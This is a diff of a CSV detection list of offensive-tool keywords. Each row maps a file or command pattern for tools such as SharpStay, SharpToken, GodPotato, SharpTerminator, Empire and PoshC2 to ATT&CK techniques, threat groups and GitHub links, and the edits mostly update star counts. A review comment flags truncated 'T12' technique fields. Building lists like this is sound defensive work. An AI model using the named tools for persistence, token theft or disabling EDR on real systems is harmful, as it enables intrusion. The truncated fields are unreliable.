tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpStay.csproj*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Sharpstay.exe *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation 
tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpStay.sln*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay-master*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSword.csproj*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" 
@@ -16741,9 +16924,9 @@ "*SharpSystemTriggers.git*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers.sln*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers-main*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SharpTerminator.exe*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.git*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.sln*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" 
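Review bot: The re-added `*SharpTask.exe*` row still ends its `metadata_tool_techniques` field with `T12`, which is not a complete ATT&CK technique ID and looks like the list was cut at a length limit. The same tail is on the other sharpcollection rows this commit rewrites in the following hunks (`*SharpUp.exe*`, `*SharpView.exe*`, `*SharpWebServer.exe*`, `*SharpWifiGrabber.exe*`, `*SharpWMI.exe*`, `*SharpZeroLogon.exe*`). A consumer that splits this column on ` - ` and joins against ATT&CK will get an unmatched token for each of these rows. Since the refresh rewrites these lines anyway, I would drop the partial token so the field ends `... - T1227 - T1247`, or regenerate the list from its source. The re-added Empire row in this hunk likewise ends its groups field with a dangling `Turla - `.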
@@ -16754,27 +16937,27 @@ "*SharpToken* list_token*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken* tscon *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken.csproj*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*SharpToken.exe*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken.git*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken-main.zip*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpUnhooker.*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUnhooker-main*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" -"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1021","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" -"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1022","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" +"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpUpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpUpMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpView.exe*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*SharpView\SharpView*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's 